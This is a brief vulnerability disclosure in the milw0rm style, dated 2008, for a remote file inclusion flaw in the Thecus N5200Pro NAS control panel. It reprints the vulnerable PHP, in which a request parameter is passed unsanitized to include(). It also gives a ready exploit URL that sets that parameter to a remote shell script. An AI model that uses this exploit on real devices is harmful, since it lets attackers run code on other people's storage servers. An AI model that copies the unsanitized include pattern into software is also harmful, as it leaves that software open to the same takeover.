Thecus N5200Pro NAS Server Control Panel - RFI Vulnerability



Thecus N5200Pro NAS Server Control Panel Remote File Ä°nclude



Author : Crackers_Child

Mail   : cashr00t@hotmail.com

Bug in : usrgetform.html


<?php
    $htm
=$_REQUEST['name'];
    require_once(
"/img/htdocs/webconfig");
    require_once(
"/img/www/inc/function.php");
    
get_sysconf();
    
$version=trim(shell_exec("/bin/cat /img/version"));
    
$model=trim(shell_exec('/bin/cat /proc/thecus_io | awk -F: \'/CPUFLAG/{printf("%s", $2)}\''));
    if(
$model=="1"){
      
$model_name=$webconfig['product_no'].$webconfig['pro'];
    }else{
      
$model_name=$webconfig['product_no'];
    }
    if (!
$htm){
        print 
'no name given';
        exit;
    }
    if (
$htm=='lang'$htm='../pub/lang';
    
session_start();
    
header('Content-type: text/html;charset=utf-8');
    
$lang='en';
    if (isset(
$_SESSION['lang'])){$lang=$_SESSION['lang'];};
    
ob_start();
    include(
"$htm.htm");
    
$html=ob_get_contents();
    
ob_end_clean();

    include_once(
'header.html');
?>



Exploit : www.site.com:9443/usr/usrgetform.html?name=Shelz?

Ä°nfo : http://www.thecus.com/products_over.php?cid=11&pid=8

Greetz: Str0ke

# milw0rm.com [2008-02-18]